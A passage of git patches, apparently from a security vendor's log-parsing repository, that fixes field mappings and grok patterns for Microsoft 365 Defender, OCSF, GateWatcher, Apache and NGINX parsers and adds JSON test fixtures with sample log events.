RemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 Defender",
         "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
       }
-    },
-    "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}"
+    }
   },
   "expected": {
     "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}",

From 5117fb76618889a055556ebd726f09beae26626c Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 2 Oct 2024 12:27:06 +0200
Subject: [PATCH 103/317] Delete repeated field

---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index d0ff72f0a..d183492a1 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -275,7 +275,6 @@ stages:
           process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}"
           process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
           process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
-          process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}"
           process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
           process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
           process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"

From 9b1eb8b9f3041659fb6bbd6d45718c5ebcc288d0 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 2 Oct 2024 14:34:36 +0200
Subject: [PATCH 104/317] fix(OCSF): add the supported version of the framework

---
 OCSF/ocsf/_meta/manifest.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml
index b962f6e78..c48ddf754 100644
--- a/OCSF/ocsf/_meta/manifest.yml
+++ b/OCSF/ocsf/_meta/manifest.yml
@@ -7,6 +7,8 @@ slug: ocsf
 description: >-
   The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema.
 
+  Supported version: **1.1**
+
 data_sources:
   File monitoring:
   Network device logs:

From 221e4395137296003cb988f47be84ee536557f46 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 2 Oct 2024 14:34:59 +0200
Subject: [PATCH 105/317] fix(OCSF): add description to data_sources

---
 OCSF/ocsf/_meta/manifest.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml
index c48ddf754..88a43ab48 100644
--- a/OCSF/ocsf/_meta/manifest.yml
+++ b/OCSF/ocsf/_meta/manifest.yml
@@ -10,6 +10,6 @@ description: >-
   Supported version: **1.1**
 
 data_sources:
-  File monitoring:
-  Network device logs:
-  Process monitoring:
+  File monitoring: OCSF allows collecting system activities
+  Network device logs: OCSF allows collection network activities
+  Process monitoring: OCSF allows collecting application activities

From 8cab1aeb661f3f262488c02c6c0e3bc22447cdbf Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 2 Oct 2024 14:35:12 +0200
Subject: [PATCH 106/317] fix(OCSF): add beta flag

---
 OCSF/ocsf/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml
index 88a43ab48..b8f0e2b86 100644
--- a/OCSF/ocsf/_meta/manifest.yml
+++ b/OCSF/ocsf/_meta/manifest.yml
@@ -1,7 +1,7 @@
 uuid: a9c959ac-78ec-47a4-924e-8156a77cebf5
 automation_connector_uuid: 04c40271-b44e-4977-8c62-5356011b2bb6
 automation_module_uuid: b4462429-6f0f-42b5-87b8-430111697d28
-name: OCSF
+name: OCSF [BETA]
 slug: ocsf
 
 description: >-

From b5eb09ecd0e89aabb9a637b76e28d07b60d8da1a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 2 Oct 2024 16:45:13 +0200
Subject: [PATCH 107/317] fix(GateWatcher): remove event.kind:'event'

---
 GateWatcher/aioniq_ecs/ingest/parser.yml            | 4 +++-
 GateWatcher/aioniq_ecs/tests/history.json           | 1 -
 GateWatcher/aioniq_ecs/tests/metadata.json          | 1 -
 GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json | 1 -
 4 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 2c654e662..bdcbb794c 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -112,13 +112,15 @@ stages:
   event:
     actions:
       - set:
-          event.kind: "{{json_load.message.event.kind}}"
           event.module: "{{json_load.message.event.module}}"
           event.dataset: "{{json_load.message.event.dataset}}"
           event.category: "{{json_load.message.event.category}}"
           event.severity: "{{json_load.message.event.severity}}"
           gatewatcher.event.id: "{{json_load.message.event.id}}"
           gatewatcher.event.created: "{{json_load.message.event.created}}"
+      - set:
+          event.kind: "{{json_load.message.event.kind}}"
+        filter: '{{json_load.message.event.kind != "event"}}'
   source:
     actions:
       - set:
diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json
index 7f04542c5..4df683706 100644
--- a/GateWatcher/aioniq_ecs/tests/history.json
+++ b/GateWatcher/aioniq_ecs/tests/history.json
@@ -15,7 +15,6 @@
         "host"
       ],
       "dataset": "administration",
-      "kind": "event",
       "module": "history"
     },
     "@timestamp": "2022-09-01T16:06:51.664000Z",
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
index 8814beb9d..168b2ea05 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
@@ -15,7 +15,6 @@
         "network"
       ],
       "dataset": "network_metadata",
-      "kind": "event",
       "module": "sigflow_http"
     },
     "@timestamp": "2024-09-12T13:24:51.231000Z",
diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
index c75ee56b5..a089e4418 100644
--- a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
+++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
@@ -16,7 +16,6 @@
         "network"
       ],
       "dataset": "network_metadata",
-      "kind": "event",
       "module": "sigflow_file"
     },
     "@timestamp": "2024-09-11T13:56:19.010000Z",

From e6ab60b7af02acf49012bec749ec08041c26fa46 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 2 Oct 2024 16:45:41 +0200
Subject: [PATCH 108/317] fix(GateWatcher): add smart-description for history
 events

---
 .../aioniq_ecs/_meta/smart-descriptions.json        | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
index aa6f3ba2b..b879d79fc 100644
--- a/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
+++ b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json
@@ -47,6 +47,19 @@
       }
     ]
   },
+  {
+    "value": "{event.module} : {gatewatcher.history.type} {gatewatcher.history.name} {gatewatcher.history.method} {gatewatcher.history.endpoint}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "administration"
+      },
+      {
+        "field": "event.module",
+        "value": "history"
+      }
+    ]
+  },
   {
     "value": "{event.module} : {gatewatcher.beacon.hostname_resolution} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})",
     "conditions": [

From d5a7689729a3d92058d04f2d843c4e581491120a Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 3 Oct 2024 10:23:17 +0200
Subject: [PATCH 109/317] fix on Apache parser for additional "-" in the logs

---
 Apache/apache/ingest/parser.yml          |  2 +-
 Apache/apache/tests/access_failure.json  | 53 +++++++++++++++++++
 Apache/apache/tests/access_redirect.json | 53 +++++++++++++++++++
 Apache/apache/tests/access_success.json  | 66 ++++++++++++++++++++++++
 4 files changed, 173 insertions(+), 1 deletion(-)
 create mode 100644 Apache/apache/tests/access_failure.json
 create mode 100644 Apache/apache/tests/access_redirect.json
 create mode 100644 Apache/apache/tests/access_success.json

diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml
index ceb5fe576..85ade0aa9 100644
--- a/Apache/apache/ingest/parser.yml
+++ b/Apache/apache/ingest/parser.yml
@@ -15,7 +15,7 @@ pipeline:
           HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}'
           HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} "%{DATA:http_request_referrer}" "%{DATA:user_agent_original}"'
           HTTPD_COMMONLOG: >-
-            (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
+            ((%{IPORHOST:destination_address}(:%{NUMBER:destination_port})|-)? )?%{IPORHOST:source_ip} (?:(\()?-(\))?|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA}
           # Apache ModSecurity logs
           APACHEERRORPREFIX: '(\[%{HTTPDERROR_DATE:timestamp}\] )?(\[%{WORD}?:%{LOGLEVEL:action_name}\] )?(\[pid %{POSINT:process_pid}(:tid %{NUMBER:process_thread_id})?\] )?(\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{NUMBER:source_port})?\])?.*'
           MODSECHOSTNAME: '\[hostname "?%{DATA:destination_domain}"?\]'
diff --git a/Apache/apache/tests/access_failure.json b/Apache/apache/tests/access_failure.json
new file mode 100644
index 000000000..4fbd29b15
--- /dev/null
+++ b/Apache/apache/tests/access_failure.json
@@ -0,0 +1,53 @@
+{
+  "input": {
+    "message": "- 1234:567:abcd:890:1234:5678:abcd:9012 - - [01/Oct/2024:10:22:11 +0200] \"GET /test.fr HTTP/1.1\" 404 1450 \"-\" \"-\"",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Apache HTTP Server",
+        "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7"
+      }
+    }
+  },
+  "expected": {
+    "message": "- 1234:567:abcd:890:1234:5678:abcd:9012 - - [01/Oct/2024:10:22:11 +0200] \"GET /test.fr HTTP/1.1\" 404 1450 \"-\" \"-\"",
+    "event": {
+      "category": [
+        "web"
+      ],
+      "outcome": "failure",
+      "type": [
+        "access"
+      ]
+    },
+    "action": {
+      "name": "GET",
+      "outcome": "failure",
+      "properties": {
+        "timestamp": "01/Oct/2024:10:22:11 +0200"
+      }
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 1450,
+        "status_code": 404
+      },
+      "version": "1.1"
+    },
+    "related": {
+      "ip": [
+        "1234:567:abcd:890:1234:5678:abcd:9012"
+      ]
+    },
+    "source": {
+      "address": "1234:567:abcd:890:1234:5678:abcd:9012",
+      "ip": "1234:567:abcd:890:1234:5678:abcd:9012"
+    },
+    "url": {
+      "original": "/test.fr",
+      "path": "/test.fr"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Apache/apache/tests/access_redirect.json b/Apache/apache/tests/access_redirect.json
new file mode 100644
index 000000000..d933d37df
--- /dev/null
+++ b/Apache/apache/tests/access_redirect.json
@@ -0,0 +1,53 @@
+{
+  "input": {
+    "message": "- 1.2.3.4 - - [01/Oct/2024:10:22:01 +0200] \"GET / HTTP/1.1\" 302 385 \"-\" \"-\"",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Apache HTTP Server",
+        "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7"
+      }
+    }
+  },
+  "expected": {
+    "message": "- 1.2.3.4 - - [01/Oct/2024:10:22:01 +0200] \"GET / HTTP/1.1\" 302 385 \"-\" \"-\"",
+    "event": {
+      "category": [
+        "web"
+      ],
+      "outcome": "redirect",
+      "type": [
+        "access"
+      ]
+    },
+    "action": {
+      "name": "GET",
+      "outcome": "redirect",
+      "properties": {
+        "timestamp": "01/Oct/2024:10:22:01 +0200"
+      }
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 385,
+        "status_code": 302
+      },
+      "version": "1.1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "url": {
+      "original": "/",
+      "path": "/"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Apache/apache/tests/access_success.json b/Apache/apache/tests/access_success.json
new file mode 100644
index 000000000..7bec8a15c
--- /dev/null
+++ b/Apache/apache/tests/access_success.json
@@ -0,0 +1,66 @@
+{
+  "input": {
+    "message": "1.2.3.4 (-) - - [01/Oct/2024:08:22:45 +0000] \"POST /App/tests HTTP/1.1\" 200 377 \"https://app.testing.fr/App/6\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\"",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Apache HTTP Server",
+        "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7"
+      }
+    }
+  },
+  "expected": {
+    "message": "1.2.3.4 (-) - - [01/Oct/2024:08:22:45 +0000] \"POST /App/tests HTTP/1.1\" 200 377 \"https://app.testing.fr/App/6\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\"",
+    "event": {
+      "category": [
+        "web"
+      ],
+      "outcome": "success",
+      "type": [
+        "access"
+      ]
+    },
+    "action": {
+      "name": "POST",
+      "outcome": "success",
+      "properties": {
+        "timestamp": "01/Oct/2024:08:22:45 +0000"
+      }
+    },
+    "http": {
+      "request": {
+        "method": "POST",
+        "referrer": "https://app.testing.fr/App/6"
+      },
+      "response": {
+        "bytes": 377,
+        "status_code": 200
+      },
+      "version": "1.1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "url": {
+      "original": "/App/tests",
+      "path": "/App/tests"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "IE",
+      "original": "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko",
+      "os": {
+        "name": "Windows",
+        "version": "8"
+      },
+      "version": "11.0"
+    }
+  }
+}
\ No newline at end of file

From bc7d883e3d9f699ce97c8130e5a3bcd3f2c6eef6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 3 Oct 2024 11:21:53 +0200
Subject: [PATCH 110/317] fix on NGINX: allowing conversion of string to int on
 action.outcome

---
 NGINX/nginx/ingest/parser.yml   |  6 ++--
 NGINX/nginx/tests/json_get.json | 61 +++++++++++++++++++++++++++++++++
 2 files changed, 64 insertions(+), 3 deletions(-)
 create mode 100644 NGINX/nginx/tests/json_get.json

diff --git a/NGINX/nginx/ingest/parser.yml b/NGINX/nginx/ingest/parser.yml
index 8a7f7c38b..a3bb82c74 100644
--- a/NGINX/nginx/ingest/parser.yml
+++ b/NGINX/nginx/ingest/parser.yml
@@ -149,11 +149,11 @@ stages:
             {%- endif -%}
           action.outcome: >
             {%- if parsed_event.message.get("response_status") != None -%}
